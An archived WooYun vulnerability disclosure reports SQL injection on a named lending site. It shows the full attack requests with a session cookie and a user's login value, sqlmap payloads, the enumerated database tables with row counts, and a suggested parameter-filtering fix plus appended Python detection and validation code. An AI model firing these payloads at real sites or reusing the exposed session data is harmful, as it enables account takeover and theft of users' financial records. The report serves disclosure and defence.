WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2016-04-06: Details have been reported to the vendor and are awaiting the vendor's handling
2016-04-06: The vendor has confirmed; details are disclosed to the vendor only
2016-04-06: The vendor has fixed the vulnerability and disclosed it proactively; details are public

The RT main site has an SQL injection vulnerability, leaking more than 25,000 records of sensitive user data.

I. Injection points
1. The maxLimit and minLimit parameters:
POST /queryLoanTransfer HTTP/1.1
Content-Length: 328
Content-Type: application/x-www-form-urlencoded
Cookie: d3e5feae0a8c7b3e_1=2cf629b810faa989c0bd98a7e0a8ace8530fa861303e770a71928c8cd4ae8fa15254b4c934422755dd1da560cfc812095b3a8d0c925e7963d1275164c311c83f; Hm_lvt_466bbed2607a2b7a987635d0100b0cdb=1459935725; Hm_lpvt_466bbed2607a2b7a987635d0100b0cdb=1459935726; loginName_16897=18649803761; userCode_16897=f332189388914d6da199cd6fabf3880e; userName_16897=test555; _jfinal_captcha=91295400e18fabbca30c6a704cbd9a23; HMACCOUNT=A9B0A6E71CF9B056; __cuid=14599352980540950; __bc_last=1459935298054; navStatus_16897=3
Host: www.yrhx.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

maxLimit=&minLimit=&pageNumber=1&pageSize=10

2. The type parameter:

POST /queryNewsByPage HTTP/1.1
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.yrhx.com:443/
Host: www.yrhx.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

isContent=1&pageNumber=1&pageSize=5&type=

3. Injection results from sqlmap:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: maxLimit (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: maxLimit=-7964 OR 7345=7345#&minLimit=&pageNumber=1&pageSize=10

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: maxLimit=-8733 OR 1 GROUP BY CONCAT(0x7176627171,(SELECT (CASE WHEN (1516=1516) THEN 1 ELSE 0 END)),0x7162787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&minLimit=&pageNumber=1&pageSize=10

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: maxLimit=(SELECT (CASE WHEN (8160=8160) THEN SLEEP(5) ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&minLimit=&pageNumber=1&pageSize=10
---
do you want to exploit this SQL injection? [Y/n]
[18:28:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
II. Data
1. All databases:

available databases [3]:
[*] information_schema
[*] test
[*] yrhxdb

2. Tables in the current database yrhxdb and their row counts:
Database: yrhxdb
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| t_funds_trace      | 1941831 |
| t_sms_log          |  180224 |
| t_recharge_trace   |  179947 |
| t_bizlog           |  165616 |
| t_loan_trace       |  141064 |
| tmp_tender         |  134564 |
| t_withdraw_trace   |   66073 |
| t_history_recy     |   52032 |
| t_location         |   46462 |
| t_funds            |   25857 |
| t_user             |   25857 |
| t_user_info        |   25857 |
| t_banks            |   13044 |
| t_auto_loan_v2     |   10216 |
| t_loan_transfer    |    8596 |
| t_loan_info        |    8501 |
| t_banks_v2         |    5593 |
| t_share            |    5087 |
| tmp_user           |    3563 |
| t_loan_apply       |     645 |
| t_loan_notice      |     564 |
| t_auto_loan        |     560 |
| t_market_user      |     173 |
| t_notice           |      74 |
| t_auth_log         |      58 |
| t_settlement_early |      58 |
| t_menu_v2          |      45 |
| t_op_user_v2       |      38 |
| tmp_xxs1           |      15 |
| t_tickets          |       8 |
| t_market           |       5 |
| t_sys_config       |       5 |
| t_sys_funds        |       1 |
| view_syscount      |       1 |
+--------------------+---------+
3. Data from some fields of the user table in the current database (partial screenshot):

4. Pick any user and log in to have a look:

Parameter filtering.
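As an added example (not part of the original report or the vendor's code), the "parameter filtering" fix above in Python: allow-list validation of the /queryLoanTransfer fields, a parameterised query over the t_loan_transfer table seen in the dump, and a signature check over POST bodies covering the three sqlmap techniques reported. The column name amount, the integer bounds and the %s placeholder style are assumptions.

```python
import re
from urllib.parse import parse_qs

# Signatures for the three sqlmap techniques in the report (detection/alerting only).
SQLI_PATTERNS = [
    re.compile(r"\bOR\b\s+\d+\s*=\s*\d+", re.I),   # boolean-based: ... OR 7345=7345
    re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),   # MySQL error-based
    re.compile(r"\bSLEEP\s*\(", re.I),             # time-based blind
    re.compile(r"INFORMATION_SCHEMA", re.I),
]

def detect_sqli(body):
    """Names of form fields in a POST body whose value matches a signature."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if any(p.search(v) for p in SQLI_PATTERNS for v in values):
            hits.append(name)
    return hits

# Assumed bounds: (lower, upper, may_be_empty) for each allowed field.
FIELDS = {"maxLimit": (0, 10**9, True), "minLimit": (0, 10**9, True),
          "pageNumber": (1, 10**6, False), "pageSize": (1, 100, False)}

def validate_loan_transfer(body):
    """Allow-list validation for /queryLoanTransfer; rejects with ValueError."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    clean = {}
    for name, (lo, hi, may_be_empty) in FIELDS.items():
        raw = params.get(name, "")
        if raw == "" and may_be_empty:
            clean[name] = None
            continue
        if not re.fullmatch(r"\d+", raw) or not lo <= int(raw) <= hi:
            raise ValueError(f"{name}: rejected value {raw!r}")
        clean[name] = int(raw)
    return clean

def build_query(clean):
    """Parameterised query over t_loan_transfer (column 'amount' assumed);
    %s placeholders as used by MySQL drivers such as PyMySQL."""
    sql, args = "SELECT * FROM t_loan_transfer WHERE 1=1", []
    if clean["minLimit"] is not None:
        sql += " AND amount >= %s"
        args.append(clean["minLimit"])
    if clean["maxLimit"] is not None:
        sql += " AND amount <= %s"
        args.append(clean["maxLimit"])
    sql += " LIMIT %s OFFSET %s"
    args += [clean["pageSize"], (clean["pageNumber"] - 1) * clean["pageSize"]]
    return sql, tuple(args)
```

Run validate_loan_transfer before any database call and pass the returned tuple from build_query as the cursor's parameter list; detect_sqli is for log review or a WAF rule, not a substitute for the validation.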
Severity: High
Vulnerability Rank: 20
Confirmed: 2016-04-06 22:33
Confirmed that the vulnerability exists, many thanks! Please contact me, there is a gift!
2016-04-06: Already handled as urgent!